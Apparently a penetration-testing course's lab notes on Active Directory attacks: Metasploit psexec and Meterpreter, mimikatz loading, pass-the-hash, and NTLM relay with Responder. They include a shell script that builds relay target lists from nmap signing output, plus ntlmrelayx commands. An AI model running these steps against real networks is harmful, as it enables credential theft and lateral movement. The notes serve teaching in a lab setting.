Week 9: NTLM
NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more
Last updated
Active Directory Exploitation - This lesson focuses on recognizing vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks introduced include: LLMNR poisoning and hash cracking, SMB/NTLM relaying, pass the hash, token impersonation, Kerberoasting, GPP cPassword attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common ones are covered.
install crackmapexec
msf5 > use exploit/windows/smb/psexec
If the module fails, try each of the psexec target options in turn (e.g. set target 3):
0 - Automatic
1 - PowerShell
2 - Native Upload
3 - MOF Upload
sysinfo in the Meterpreter shell shows the host architecture; you may see an x64 host but a 32-bit (x86) Meterpreter because of the payload that was used.
You can look through the payloads and pick a better (x64) one next time.
In the Meterpreter shell, type load and hit tab twice to see everything that can be loaded, e.g. kiwi (the mimikatz extension).
Process migration: migrate into a running x64 process to get an x64 Meterpreter shell.
The local Administrator account (and its password hash) is often the same across many computers if IT images them from the same base image, so one captured hash can log in to all of them.
You can pass the hash with crackmapexec (-H takes the NTLM hash instead of a password)
or with psexec (Metasploit's psexec accepts the LM:NT hash as SMBPass; Impacket's psexec.py takes -hashes).
If SMB communications are not digitally signed, you can NTLM relay. SMB signing is enabled but NOT required by default on Windows workstations and member servers; it is only required by default on domain controllers, so most hosts in a typical network are relay targets.
Heath demonstrates an environment where one user has local administrative privileges on multiple machines, so an authentication captured from that user can be relayed to any of them.
Edit Responder.conf: in the [Responder Core] section set SMB = Off and HTTP = Off, so Responder only poisons name resolution and the victim's SMB/HTTP connection goes to the relay tool instead of being answered by Responder.
Start Responder: Responder.py -I eth0 -rdw
Wait for a victim to resolve a name that doesn't exist (typo, stale share, etc.).
To force it in the lab, point a victim machine at your attacker IP in File Explorer, e.g. \\192.168.202.173; the victim's NTLM authentication is then relayed to a host where that user is a local admin.
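Before starting the poisoner it is worth knowing which hosts will actually accept a relayed session, since a relay into a host that requires SMB signing just fails. The script below is an added example, not part of these notes or of the course: it turns nmap smb2-security-mode output into a target list for a relay tool, dropping hosts whose signing is "enabled and required". The nmap output, hostnames and IPs are constructed sample data, and the choice of Impacket's ntlmrelayx.py as the relay tool is an assumption (the notes only say "NTLM relay").

```shell
#!/bin/sh
# Added example: build a relay target list from nmap smb2-security-mode output.
# Hosts that REQUIRE signing are dropped: a relayed NTLM session cannot
# produce a valid signature, so the relay would fail against them.

# Constructed sample of nmap normal output (not from a real scan; hosts,
# hostnames and IPs are made up for illustration).
SAMPLE_NMAP='Nmap scan report for dc01.lab.local (192.168.202.10)
Host is up (0.00050s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.168.202.20
Host is up (0.00031s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.202.30
Host is up (0.00044s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing disabled

Nmap scan report for 192.168.202.40
Host is up (0.00060s latency).
PORT    STATE SERVICE
445/tcp closed microsoft-ds
'

# relay_targets: read nmap normal output on stdin and print one IP per line
# for every host whose SMB2 message signing is anything other than
# "enabled and required". Hosts with no smb2-security-mode result
# (port closed, script did not run) produce no line at all.
relay_targets() {
  awk '
    /^Nmap scan report for/ {
      host = $NF               # last field is "IP" or "(IP)" after a hostname
      gsub(/[()]/, "", host)
    }
    /Message signing/ {
      # "enabled and required" means the relay will fail: skip this host
      if ($0 ~ /required/ && $0 !~ /not required/) next
      print host
    }
  '
}

# Wrapper over the constructed sample so the result can be checked.
relay_targets_from_sample() {
  printf '%s\n' "$SAMPLE_NMAP" | relay_targets
}

relay_targets_from_sample

# Real run (not executed here; needs nmap and Impacket on the attack box):
#   nmap -p445 --script smb2-security-mode -oN smb_signing.txt 192.168.202.0/24
#   relay_targets < smb_signing.txt > targets.txt
#   ntlmrelayx.py -tf targets.txt -smb2support
# Then start Responder with its SMB and HTTP servers turned off so the
# poisoned victims connect to ntlmrelayx rather than to Responder itself.
```

The domain controller in the sample is excluded on purpose: DCs require signing by default, so a relay aimed at one is wasted and noisy. The two workstations, one with signing optional and one with it disabled, are the hosts worth listing.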